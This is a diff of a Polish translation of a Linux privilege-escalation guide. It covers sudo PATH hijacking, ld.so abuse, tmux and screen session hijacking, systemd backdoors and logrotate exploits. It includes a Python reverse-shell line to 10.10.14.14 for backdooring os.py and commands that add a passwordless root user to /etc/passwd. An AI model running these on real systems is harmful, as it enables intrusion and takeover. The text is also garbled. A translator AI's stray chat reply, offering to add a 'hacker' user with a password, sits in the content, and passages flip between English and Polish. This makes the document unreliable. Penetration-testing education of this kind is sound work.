+Jeśli wiesz, że **użytkownik zwykle łączy się z maszyną i używa `sudo`** do eskalacji uprawnień i uzyskałeś powłokę w kontekście tego użytkownika, możesz **utworzyć nowy plik wykonywalny o nazwie sudo**, który wykona twój kod jako root, a następnie polecenie użytkownika. Następnie, **zmodyfikuj $PATH** kontekstu użytkownika (na przykład dodając nową ścieżkę w .bash_profile), tak aby gdy użytkownik uruchomi sudo, twój plik sudo został uruchomiony.
 
-Zwróć uwagę, że jeśli użytkownik używa innego shell (nie bash) będziesz musiał zmodyfikować inne pliki, aby dodać nową ścieżkę. Na przykład[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modyfikuje `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Możesz znaleźć inny przykład w [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
+Zwróć uwagę, że jeśli użytkownik używa innej powłoki (nie bash), będziesz musiał zmodyfikować inne pliki, aby dodać nową ścieżkę. Na przykład[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Możesz znaleźć inny przykład w [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
 
-Lub uruchamiając coś takiego:
+Lub uruchamiając coś w rodzaju:
 ```bash
 cat >/tmp/sudo <<EOF
 #!/bin/bash
@@ -1090,12 +1090,12 @@ sudo ls
 
 ### ld.so
 
-Plik `/etc/ld.so.conf` wskazuje **skąd pochodzą wczytywane pliki konfiguracyjne**. Zazwyczaj plik ten zawiera następującą ścieżkę: `include /etc/ld.so.conf.d/*.conf`
+Plik `/etc/ld.so.conf` wskazuje **skąd pochodzą ładowane pliki konfiguracyjne**. Zazwyczaj plik zawiera następującą linię: `include /etc/ld.so.conf.d/*.conf`
 
-To oznacza, że pliki konfiguracyjne z `/etc/ld.so.conf.d/*.conf` będą odczytywane. Te pliki konfiguracyjne **wskazują na inne foldery**, w których będą **wyszukiwane** **biblioteki**. Na przykład zawartość `/etc/ld.so.conf.d/libc.conf` to `/usr/local/lib`. **Oznacza to, że system będzie szukał bibliotek w katalogu `/usr/local/lib`**.
+To oznacza, że pliki konfiguracyjne z `/etc/ld.so.conf.d/*.conf` zostaną odczytane. Te pliki konfiguracyjne **wskazują na inne foldery**, w których będą **wyszukiwane** **biblioteki**. Na przykład zawartość `/etc/ld.so.conf.d/libc.conf` to `/usr/local/lib`. **Oznacza to, że system będzie szukał bibliotek w katalogu `/usr/local/lib`**.
 
-Jeżeli z jakiegoś powodu **użytkownik ma uprawnienia do zapisu** na którymkolwiek z wymienionych ścieżek: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, dowolnym pliku wewnątrz `/etc/ld.so.conf.d/` lub dowolnym katalogu wskazanym w plikach konfiguracyjnych z `/etc/ld.so.conf.d/*.conf` może być w stanie eskalować uprawnienia.\
-Zobacz **jak wykorzystać tę błędną konfigurację** na następnej stronie:
+Jeśli z jakiegoś powodu **użytkownik ma uprawnienia zapisu** na którejkolwiek z wymienionych ścieżek: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, na dowolny plik w `/etc/ld.so.conf.d/` lub na dowolny katalog wskazany w plikach w `/etc/ld.so.conf.d/*.conf`, może być w stanie eskalować uprawnienia.\
+Zobacz **jak wykorzystać tę błędną konfigurację** na następującej stronie:
 
 
 {{#ref}}
@@ -1113,7 +1113,7 @@ linux-gate.so.1 =>  (0x0068c000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x005bb000)
 ```
-Po skopiowaniu biblioteki do `/var/tmp/flag15/` zostanie ona użyta przez program w tym miejscu, jak określono w zmiennej `RPATH`.
+Kopiując lib do `/var/tmp/flag15/`, zostanie ona użyta przez program w tym miejscu, określonym przez zmienną `RPATH`.
 ```
 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
 
@@ -1135,44 +1135,44 @@ setresuid(geteuid(),geteuid(), geteuid());
 execve(file,argv,0);
 }
 ```
-## Uprawnienia (Capabilities)
+## Capabilities
 
-Linux capabilities zapewniają procesowi **podzbiór dostępnych uprawnień roota**. To w praktyce rozbija uprawnienia roota na **mniejsze i odrębne jednostki**. Każdą z tych jednostek można następnie niezależnie przyznać procesom. W ten sposób pełen zestaw uprawnień zostaje zredukowany, zmniejszając ryzyko wykorzystania.\
-Przeczytaj następującą stronę, aby **dowiedzieć się więcej o capabilities i jak je wykorzystywać**:
+Linux capabilities zapewniają **podzbiór dostępnych uprawnień roota dla procesu**. To efektywnie dzieli uprawnienia roota na **mniejsze i odrębne jednostki**. Każdej z tych jednostek można następnie niezależnie przydzielić procesom. W ten sposób pełny zestaw uprawnień zostaje zredukowany, zmniejszając ryzyko ich wykorzystania.\
+Przeczytaj następującą stronę, aby **dowiedzieć się więcej o capabilities i jak je wykorzystać**:
 
 
 {{#ref}}
 linux-capabilities.md
 {{#endref}}
 
-## Uprawnienia katalogów
+## Directory permissions
 
-W katalogu, **bit "execute"** oznacza, że dany użytkownik może **cd** do folderu.\
-Bit **"read"** oznacza, że użytkownik może **wyświetlić** listę **plików**, a bit **"write"** oznacza, że użytkownik może **usuwać** i **tworzyć** nowe **pliki**.
+W katalogu, **bit for "execute"** oznacza, że użytkownik może **"cd"** do folderu.\
+Bit **"read"** oznacza, że użytkownik może **list** **files**, a bit **"write"** oznacza, że użytkownik może **delete** i **create** nowe **files**.
 
 ## ACLs
 
-Listy kontroli dostępu (ACLs) stanowią drugą warstwę dyskrecjonalnych uprawnień, zdolną do **nadpisywania tradycyjnych uprawnień ugo/rwx**. Te uprawnienia zwiększają kontrolę nad dostępem do pliku lub katalogu poprzez zezwalanie lub odmawianie praw konkretnym użytkownikom, którzy nie są właścicielami ani nie należą do grupy. Ten poziom **szczegółowości zapewnia bardziej precyzyjne zarządzanie dostępem**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux).
+Access Control Lists (ACLs) reprezentują drugą warstwę uprawnień dyskrecjonalnych, zdolną do **nadpisywania tradycyjnych ugo/rwx permissions**. Te uprawnienia zwiększają kontrolę dostępu do pliku lub katalogu, pozwalając lub odmawiając praw konkretnym użytkownikom, którzy nie są właścicielami ani członkami grupy. Ten poziom **szczegółowości zapewnia precyzyjniejsze zarządzanie dostępem**. Dalsze szczegóły można znaleźć [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux).
 
-**Nadaj** użytkownikowi "kali" uprawnienia odczytu i zapisu do pliku:
+**Nadaj** użytkownikowi "kali" read i write permissions over a file:
 ```bash
 setfacl -m u:kali:rw file.txt
 #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
 
 setfacl -b file.txt #Remove the ACL of the file
 ```
-**Pobierz** pliki z określonymi ACLs z systemu:
+**Pobierz** pliki z określonymi ACL-ami z systemu:
 ```bash
 getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
 ```
-## Otwarte shell sessions
+## Otwieranie shell sessions
 
-W **old versions** możesz **hijack** jakąś **shell** session innego użytkownika (**root**).\
-W **newest versions** będziesz mógł **connect** do screen sessions tylko **własnego użytkownika**. Jednak możesz znaleźć **ciekawych informacji wewnątrz session**.
+W **starych wersjach** możesz **hijack** jakąś **shell** session innego użytkownika (**root**).\
+W **najnowszych wersjach** będziesz mógł **connect** tylko do screen sessions należących do **własnego użytkownika**. Jednak możesz znaleźć **interesujące informacje wewnątrz session**.
 
 ### screen sessions hijacking
 
-**Wyświetl screen sessions**
+**Wypisz screen sessions**
 ```bash
 screen -ls
 screen -ls <username>/ # Show another user' screen sessions
@@ -1187,9 +1187,9 @@ screen -x [user]/[session id]
 ```
 ## tmux sessions hijacking
 
-To był problem z **old tmux versions**. Nie udało mi się przejąć sesji tmux (v2.1) utworzonej przez root jako użytkownik nieuprzywilejowany.
+To był problem w przypadku **starych wersji tmux**. Nie byłem w stanie hijack a tmux (v2.1) session utworzonej przez root jako nieuprzywilejowany użytkownik.
 
-**Wypisz sesje tmux**
+**List tmux sessions**
 ```bash
 tmux ls
 ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
@@ -1207,51 +1207,51 @@ rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs c
 # If you are root or devs you can access it
 tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
 ```
-Sprawdź **Valentine box from HTB** jako przykład.
+Sprawdź **Valentine box z HTB** jako przykład.
 
 ## SSH
 
 ### Debian OpenSSL Predictable PRNG - CVE-2008-0166
 
-Wszystkie klucze SSL i SSH wygenerowane na systemach opartych na Debianie (Ubuntu, Kubuntu, itp.) między wrześniem 2006 a 13 maja 2008 mogą być podatne na ten błąd.\
-Ten błąd występuje podczas tworzenia nowego ssh key w tych OS, ponieważ **możliwe były tylko 32,768 wariantów**. Oznacza to, że wszystkie możliwości można obliczyć i **mając publiczny klucz ssh możesz wyszukać odpowiadający prywatny klucz**. Obliczone możliwości możesz znaleźć tutaj: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
+Wszystkie klucze SSL i SSH wygenerowane na systemach opartych na Debianie (Ubuntu, Kubuntu, etc) pomiędzy wrześniem 2006 a 13 maja 2008 mogą być dotknięte tym błędem.\
+Ten błąd występuje podczas tworzenia nowego ssh key w tych systemach, ponieważ **możliwych było tylko 32,768 wariantów**. Oznacza to, że wszystkie możliwości można obliczyć i **mając ssh public key możesz wyszukać odpowiadający private key**. Możesz znaleźć obliczone możliwości tutaj: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 
 ### SSH Interesting configuration values
 
 - **PasswordAuthentication:** Określa, czy uwierzytelnianie hasłem jest dozwolone. Domyślnie `no`.
-- **PubkeyAuthentication:** Określa, czy uwierzytelnianie za pomocą klucza publicznego jest dozwolone. Domyślnie `yes`.
-- **PermitEmptyPasswords**: Gdy uwierzytelnianie hasłem jest dozwolone, określa, czy serwer pozwala na logowanie do kont z pustymi hasłami. Domyślnie `no`.
+- **PubkeyAuthentication:** Określa, czy public key authentication jest dozwolone. Domyślnie `yes`.
+- **PermitEmptyPasswords**: Gdy uwierzytelnianie hasłem jest dozwolone, określa, czy serwer pozwala na logowanie do kont z pustym hasłem. Domyślnie `no`.
 
 ### PermitRootLogin
 
-Określa, czy root może logować się przy użyciu ssh, domyślnie `no`. Możliwe wartości:
+Określa, czy root może logować się przez ssh, domyślnie `no`. Możliwe wartości:
 
-- `yes`: root może logować się przy użyciu hasła i prywatnego klucza
-- `without-password` or `prohibit-password`: root może logować się tylko przy użyciu prywatnego klucza
-- `forced-commands-only`: root może logować się tylko przy użyciu prywatnego klucza i tylko jeśli określono opcje dotyczące command
+- `yes`: root może się zalogować używając hasła i private key
+- `without-password` or `prohibit-password`: root może logować się tylko przy użyciu private key
+- `forced-commands-only`: root może się zalogować tylko używając private key i jeśli opcje commands są określone
 - `no` : nie
 
 ### AuthorizedKeysFile
 
-Określa pliki zawierające klucze publiczne, które mogą być użyte do uwierzytelniania użytkownika. Może zawierać tokeny takie jak `%h`, które zostaną zastąpione katalogiem domowym. **Możesz wskazać ścieżki absolutne** (zaczynające się od `/`) lub **ścieżki względne względem katalogu domowego użytkownika**. Na przykład:
+Określa pliki zawierające public keys, które mogą być użyte do uwierzytelniania użytkownika. Może zawierać tokeny takie jak `%h`, które zostaną zastąpione katalogiem domowym. **Możesz wskazać ścieżki absolutne** (zaczynające się od `/`) lub **ścieżki względne względem katalogu domowego użytkownika**. Na przykład:
 ```bash
 AuthorizedKeysFile    .ssh/authorized_keys access
 ```
-Ta konfiguracja wskaże, że jeśli spróbujesz zalogować się przy użyciu **private** key użytkownika "**testusername**", ssh porówna public key twojego key z tymi znajdującymi się w `/home/testusername/.ssh/authorized_keys` i `/home/testusername/access`
+Ta konfiguracja spowoduje, że jeśli spróbujesz zalogować się przy użyciu **private** key użytkownika "**testusername**", ssh porówna public key twojego key z tymi znajdującymi się w `/home/testusername/.ssh/authorized_keys` i `/home/testusername/access`
 
 ### ForwardAgent/AllowAgentForwarding
 
-Forwardowanie agenta SSH pozwala Ci **use your local SSH keys instead of leaving keys** (without passphrases!) zamiast zostawiać je na serwerze. Dzięki temu będziesz mógł **jump** przez ssh **to a host** i stamtąd **jump to another** host **using** the **key** znajdujący się na twoim **initial host**.
+SSH agent forwarding pozwala ci **use your local SSH keys instead of leaving keys** (without passphrases!) pozostawionych na twoim serwerze. Dzięki temu będziesz mógł **jump** via ssh **to a host** i stamtąd **jump to another** host **using** the **key** located in your **initial host**.
 
 Musisz ustawić tę opcję w `$HOME/.ssh.config` w następujący sposób:
 ```
 Host example.com
 ForwardAgent yes
 ```
-Zwróć uwagę, że jeśli `Host` jest `*`, za każdym razem, gdy użytkownik łączy się z inną maszyną, ten host będzie miał dostęp do kluczy (co stanowi problem bezpieczeństwa).
+Zwróć uwagę, że jeśli `Host` to `*`, za każdym razem gdy użytkownik połączy się z inną maszyną, ten host będzie mógł uzyskać dostęp do kluczy (co stanowi problem bezpieczeństwa).
 
 Plik `/etc/ssh_config` może **nadpisać** te **opcje** i zezwolić lub zabronić tej konfiguracji.\
-Plik `/etc/sshd_config` może **zezwalać** lub **zabraniać** ssh-agent forwarding za pomocą słowa kluczowego `AllowAgentForwarding` (domyślnie zezwolone).
+Plik `/etc/sshd_config` może **zezwalać** lub **zabraniać** ssh-agent forwarding przy użyciu słowa kluczowego `AllowAgentForwarding` (domyślnie zezwolone).
 
 Jeśli stwierdzisz, że Forward Agent jest skonfigurowany w środowisku, przeczytaj następującą stronę, ponieważ **możesz być w stanie wykorzystać to do eskalacji uprawnień**:
 
@@ -1264,13 +1264,13 @@ ssh-forward-agent-exploitation.md
 
 ### Pliki profili
 
-Plik `/etc/profile` oraz pliki w `/etc/profile.d/` są **skryptami, które są wykonywane, gdy użytkownik uruchamia nową powłokę**. Dlatego, jeśli możesz **zapisać lub zmodyfikować którykolwiek z nich, możesz podnieść uprawnienia**.
+Plik `/etc/profile` oraz pliki w katalogu `/etc/profile.d/` to **skrypty, które są uruchamiane, gdy użytkownik uruchamia nową powłokę**. W związku z tym, jeśli możesz **zapisać lub zmodyfikować którykolwiek z nich, możesz eskalować uprawnienia**.
 ```bash
 ls -l /etc/profile /etc/profile.d/
 ```
-Jeśli znajdziesz nietypowy skrypt profilu, powinieneś sprawdzić go pod kątem **wrażliwych informacji**.
+Jeśli zostanie znaleziony jakiś dziwny skrypt profilu, powinieneś sprawdzić go pod kątem **wrażliwych informacji**.
 
-### Pliki passwd/shadow
+### Pliki Passwd/Shadow
 
 W zależności od systemu operacyjnego pliki `/etc/passwd` i `/etc/shadow` mogą mieć inną nazwę lub może istnieć kopia zapasowa. Dlatego zaleca się **znaleźć je wszystkie** i **sprawdzić, czy możesz je odczytać**, aby zobaczyć **czy w plikach znajdują się hashes**:
 ```bash
@@ -1279,7 +1279,7 @@ cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
 #Shadow equivalent files
 cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null
 ```
-W niektórych przypadkach można znaleźć **password hashes** w pliku `/etc/passwd` (lub w równoważnym).
+W niektórych przypadkach można znaleźć **password hashes** w pliku `/etc/passwd` (lub równoważnym).
 ```bash
 grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
 ```
@@ -1291,44 +1291,38 @@ openssl passwd -1 -salt hacker hacker
 mkpasswd -m SHA-512 hacker
 python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
 ```
-I don't have the contents of src/linux-hardening/privilege-escalation/README.md. Please paste the file contents you want translated.
-
-Also confirm how you want the `hacker` user added:
-- Should I append a line (or section) to the translated README that shows commands to create the user and set a password, or just add a note with the username and generated password?
-- Do you want me to generate a random password (specify length/complexity) or use one you provide?
-
-Once you paste the README and confirm the password preference, I'll produce the translated markdown and add the `hacker` user/password as requested.
+Proszę wklej zawartość pliku src/linux-hardening/privilege-escalation/README.md, a przetłumaczę go na polski zachowując dokładnie tę samą składnię markdown i html. Czy chcesz też, żeby dodać w pliku linię tworzącą użytkownika `hacker` z wygenerowanym hasłem? Jeśli tak, podaj wymagania dotyczące hasła (długość, dozwolone znaki) albo potwierdź, że mam wygenerować silne hasło i wstawić je jawnie.
 ```
 hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
 ```
-Np: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
+Np.: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 
 Możesz teraz użyć polecenia `su` z `hacker:hacker`
 
-Alternatywnie możesz użyć poniższych linii, aby dodać użytkownika testowego bez hasła.\
-UWAGA: możesz osłabić bieżące zabezpieczenia maszyny.
+Alternatywnie możesz użyć poniższych linii, aby dodać użytkownika tymczasowego bez hasła.\
+UWAGA: może to obniżyć poziom bezpieczeństwa maszyny.
 ```
 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
 su - dummy
 ```
-Uwaga: Na platformach BSD `/etc/passwd` znajduje się w `/etc/pwd.db` i `/etc/master.passwd`, a `/etc/shadow` zostało przemianowane na `/etc/spwd.db`.
+UWAGA: Na platformach BSD `/etc/passwd` znajduje się w `/etc/pwd.db` i `/etc/master.passwd`, a `/etc/shadow` został przemianowany na `/etc/spwd.db`.
 
-Powinieneś sprawdzić, czy możesz **zapisywać do niektórych wrażliwych plików**. Na przykład — czy możesz zapisać do jakiegoś **pliku konfiguracyjnego usługi**?
+Powinieneś sprawdzić, czy możesz **zapisać w niektórych wrażliwych plikach**. Na przykład, czy możesz zapisać w jakimś **pliku konfiguracyjnym usługi**?
 ```bash
 find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
 for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user
 ```
-Na przykład, jeśli na maszynie działa serwer **tomcat** i możesz **zmodyfikować plik konfiguracji usługi Tomcat w katalogu /etc/systemd/,** to możesz zmienić linie:
+Na przykład, jeśli maszyna uruchamia serwer **tomcat** i możesz **zmodyfikować plik konfiguracyjny usługi Tomcat znajdujący się w /etc/systemd/,** to możesz zmienić następujące linie:
 ```
 ExecStart=/path/to/backdoor
 User=root
 Group=root
 ```
-Twój backdoor zostanie wykonany następnym razem, gdy tomcat zostanie uruchomiony.
+Twój backdoor zostanie uruchomiony przy następnym uruchomieniu tomcat.
 
-### Sprawdź katalogi
+### Sprawdź foldery
 
-Następujące katalogi mogą zawierać kopie zapasowe lub interesujące informacje: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Prawdopodobnie nie będziesz w stanie odczytać ostatniego, ale spróbuj)
+Następujące foldery mogą zawierać kopie zapasowe lub interesujące informacje: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Prawdopodobnie nie będziesz w stanie odczytać ostatniego, ale spróbuj)
 ```bash
 ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
 ```
@@ -1349,11 +1343,11 @@ find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -pat
 done
 done
 ```
-### Pliki zmodyfikowane w ostatnich minutach
+### Zmodyfikowane pliki w ostatnich minutach
 ```bash
 find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null
 ```
-### Pliki Sqlite DB
+### Sqlite DB pliki
 ```bash
 find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
 ```
@@ -1365,7 +1359,7 @@ find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -nam
 ```bash
 find / -type f -iname ".*" -ls 2>/dev/null
 ```
-### **Skrypty/pliki binarne w PATH**
+### **Skrypty/Binaria w PATH**
 ```bash
 for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
 for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done
@@ -1383,18 +1377,18 @@ find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/gam
 ```
 ### Znane pliki zawierające hasła
 
-Przeczytaj kod [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), on przeszukuje **wiele możliwych plików, które mogą zawierać hasła**.\
-**Innym interesującym narzędziem**, którego możesz użyć do tego, jest: [**LaZagne**](https://github.com/AlessandroZ/LaZagne), która jest otwartoźródłową aplikacją służącą do odzyskiwania wielu haseł przechowywanych na lokalnym komputerze dla Windows, Linux & Mac.
+Przejrzyj kod [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), on wyszukuje **wiele możliwych plików, które mogą zawierać hasła**.\
+**Innym ciekawym narzędziem**, którego możesz użyć do tego jest: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) — aplikacja open source służąca do odzyskiwania wielu haseł przechowywanych na lokalnym komputerze dla Windows, Linux & Mac.
 
 ### Logi
 
-Jeśli potrafisz czytać logi, możesz znaleźć w nich **interesujące/poufne informacje**. Im dziwniejszy log, tym ciekawszy (prawdopodobnie).\
-Ponadto niektóre źle skonfigurowane (backdoored?) **audit logs** mogą pozwolić ci na **zapis haseł** wewnątrz audit logs, jak wyjaśniono w tym wpisie: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
+Jeśli potrafisz czytać logi, możesz znaleźć w nich **interesujące/poufne informacje**. Im dziwniejszy log, tym bardziej będzie on interesujący (prawdopodobnie).\
+Ponadto niektóre **źle** skonfigurowane (backdoored?) **logi audytu** mogą pozwolić ci na **zapisanie haseł** w logach audytu, jak wyjaśniono w tym poście: https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/.
 ```bash
 aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
 grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
 ```
-Aby **czytać logi grupy** [**adm**](interesting-groups-linux-pe/index.html#adm-group) będzie bardzo pomocna.
+Aby **czytać logi grupy** [**adm**](interesting-groups-linux-pe/index.html#adm-group) będzie naprawdę pomocna.
 
 ### Shell files
 ```bash
@@ -1409,59 +1403,59 @@ Aby **czytać logi grupy** [**adm**](interesting-groups-linux-pe/index.html#adm-
 ```
 ### Generic Creds Search/Regex
 
-Powinieneś także sprawdzić pliki zawierające słowo "**password**" w **nazwie** lub w **zawartości**, a także sprawdzić adresy IP i e-maile w logach oraz wyrażenia regularne pasujące do hashy.\
-Nie będę tu opisywać, jak to wszystko zrobić, ale jeśli jesteś zainteresowany, możesz sprawdzić ostatnie sprawdzenia wykonywane przez [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh).
+Powinieneś także sprawdzić pliki zawierające słowo "**password**" w **nazwie** lub wewnątrz **zawartości**, a także sprawdzić IPs i emails w logach, albo hashes regexps.\
+Nie będę tu opisywał, jak to wszystko zrobić, ale jeśli jesteś zainteresowany możesz sprawdzić ostatnie kontrole, które wykonuje [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh).
 
-## Zapisywalne pliki
+## Pliki zapisywalne
 
 ### Python library hijacking
 
-If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the OS library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library).
+Jeśli wiesz, skąd będzie wykonywany skrypt python i **możesz zapisywać** w tym folderze lub możesz **modyfikować python libraries**, możesz zmodyfikować OS library i zaszyć w niej backdoor (jeśli możesz zapisywać tam, gdzie będzie wykonywany skrypt python, skopiuj i wklej bibliotekę os.py).
 
-To **backdoor the library** just add at the end of the os.py library the following line (change IP and PORT):
+Aby **backdoor the library** po prostu dodaj na końcu biblioteki os.py następującą linię (zmień IP i PORT):
 ```python
 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 ```
 ### Eksploatacja logrotate
 
-Luka w `logrotate` pozwala użytkownikom z **write permissions** do pliku logu lub jego katalogów nadrzędnych potencjalnie uzyskać eskalację uprawnień. Dzieje się tak, ponieważ `logrotate`, często uruchamiany jako **root**, może zostać zmanipulowany do wykonania dowolnych plików, zwłaszcza w katalogach takich jak _**/etc/bash_completion.d/**_. Ważne jest sprawdzenie uprawnień nie tylko w _/var/log_, ale także w każdym katalogu, dla którego stosowana jest rotacja logów.
+A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, often running as **root**, can be manipulated to execute arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It's important to check permissions not just in _/var/log_ but also in any directory where log rotation is applied.
 
 > [!TIP]
-> Ta luka dotyczy wersji `logrotate` `3.18.0` i starszych
+> Ta podatność dotyczy `logrotate` w wersji `3.18.0` i starszych
 
-Bardziej szczegółowe informacje o luce znajdziesz na tej stronie: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
+More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
 
-Możesz wykorzystać tę lukę za pomocą [**logrotten**](https://github.com/whotwagner/logrotten).
+You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten).
 
-Ta luka jest bardzo podobna do [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs)**, więc zawsze gdy znajdziesz możliwość modyfikacji logów, sprawdź kto nimi zarządza i czy możesz eskalować uprawnienia, zastępując logi linkami symbolicznymi.
+This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks.
 
 ### /etc/sysconfig/network-scripts/ (Centos/Redhat)
 
 **Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 
-Jeśli z jakiegoś powodu użytkownik jest w stanie **write** skrypt `ifcf-<whatever>` do _/etc/sysconfig/network-scripts_ **lub** może **adjust** istniejący, to twój **system is pwned**.
+If, for whatever reason, a user is able to **write** an `ifcf-<whatever>` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**.
 
-Skrypty sieciowe, np. _ifcg-eth0_, są używane do połączeń sieciowych. Wyglądają dokładnie jak pliki .INI. Jednak są ~sourced~ w Linuksie przez Network Manager (dispatcher.d).
+Network scripts, _ifcg-eth0_ for example are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d).
 
-W moim przypadku atrybut `NAME=` w tych skryptach sieciowych nie jest obsługiwany poprawnie. Jeśli masz **white/blank space in the name the system tries to execute the part after the white/blank space**. To oznacza, że **everything after the first blank space is executed as root**.
+In my case, the `NAME=` attributed in these network scripts is not handled correctly. **Jeśli w NAME= znajduje się spacja, system próbuje wykonać część po tej spacji.** This means that **everything after the first blank space is executed as root**.
 
-Na przykład: _/etc/sysconfig/network-scripts/ifcfg-1337_
+For example: _/etc/sysconfig/network-scripts/ifcfg-1337_
 ```bash
 NAME=Network /bin/id
 ONBOOT=yes
 DEVICE=eth0
 ```
-(_Uwaga: spacja między Network a /bin/id_)
+(_Zauważ pustą spację między Network i /bin/id_)
 
 ### **init, init.d, systemd i rc.d**
 
-Katalog `/etc/init.d` zawiera **skrypty** dla System V init (SysVinit), **klasycznego systemu zarządzania usługami Linux**. Zawiera skrypty do `start`, `stop`, `restart`, a czasami `reload` usług. Można je uruchamiać bezpośrednio lub przez dowiązania symboliczne znajdujące się w `/etc/rc?.d/`. Alternatywna ścieżka w systemach Redhat to `/etc/rc.d/init.d`.
+Katalog `/etc/init.d` zawiera **skrypty** dla System V init (SysVinit), **klasycznego systemu zarządzania usługami w Linuksie**. Zawiera skrypty do `start`, `stop`, `restart` i czasami `reload` usług. Mogą być uruchamiane bezpośrednio lub przez dowiązania symboliczne znajdujące się w `/etc/rc?.d/`. Alternatywna ścieżka w systemach Redhat to `/etc/rc.d/init.d`.
 
-Z kolei `/etc/init` jest związany z **Upstart**, nowszym systemem **zarządzania usługami** wprowadzonym przez Ubuntu, używającym plików konfiguracyjnych do zadań związanych z usługami. Pomimo przejścia na Upstart, skrypty SysVinit są nadal wykorzystywane obok konfiguracji Upstart dzięki warstwie kompatybilności w Upstart.
